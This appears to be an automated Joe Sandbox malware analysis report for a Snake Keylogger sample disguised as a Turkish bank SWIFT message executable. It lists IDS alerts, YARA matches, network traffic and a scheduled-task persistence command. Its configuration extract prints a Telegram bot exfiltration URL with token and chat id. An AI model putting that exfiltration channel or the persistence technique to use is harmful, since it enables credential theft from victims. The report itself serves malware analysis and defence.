Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", ProcessId: 2128, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T19:07:21.049407+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.16.1	443	TCP
2025-02-20T19:07:22.404580+0100	2803305	3	Unknown Traffic	192.168.2.5	49710	104.21.16.1	443	TCP
2025-02-20T19:07:27.070446+0100	2803305	3	Unknown Traffic	192.168.2.5	49721	104.21.16.1	443	TCP
2025-02-20T19:07:28.394620+0100	2803305	3	Unknown Traffic	192.168.2.5	49724	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T19:07:19.118777+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2025-02-20T19:07:20.603180+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2025-02-20T19:07:21.884442+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	132.226.247.73	80	TCP
2025-02-20T19:07:23.618767+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	132.226.247.73	80	TCP
2025-02-20T19:07:24.834114+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	132.226.247.73	80	TCP
2025-02-20T19:07:26.446951+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49719	132.226.247.73	80	TCP
2025-02-20T19:07:27.757288+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49722	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc/sendMessage?chat_id=7053140371", "Token": "7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc", "Chat_id": "7053140371", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: Ziraat Bankasi Swift Mesaji.exe	Virustotal: Detection: 36%			Perma Link
Source: Ziraat Bankasi Swift Mesaji.exe	ReversingLabs: Detection: 52%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	String decryptor:
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	String decryptor: 7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	String decryptor: 7053140371

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Accessibility.pdbj source: WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Xml.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: XfbOZ.pdb source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
Source:	Binary string: Accessibility.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.pdbt source: WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: XfbOZ.pdbSHA256 source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
Source:	Binary string: System.Configuration.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Xml.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Core.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: Accessibility.pdbE source: WER79E4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: mscorlib.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.pdb4 source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Core.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.pdbH source: WER79E4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0155F1F6h	8_2_0155F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0155FB80h	8_2_0155F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_0155E528

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.16.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.000000000308F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Ziraat Bankasi Swift Mesaji.exe, ZnbATfUbUgZW.exe.0.dr	String found in binary or memory: http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn
Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2306180646.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01556108	8_2_01556108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155C190	8_2_0155C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155F007	8_2_0155F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155B328	8_2_0155B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155C470	8_2_0155C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155C751	8_2_0155C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01556730	8_2_01556730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01559858	8_2_01559858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155BBD2	8_2_0155BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155CA31	8_2_0155CA31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01554AD9	8_2_01554AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155BEB0	8_2_0155BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01553570	8_2_01553570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155E517	8_2_0155E517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155E528	8_2_0155E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0155B4F2	8_2_0155B4F2
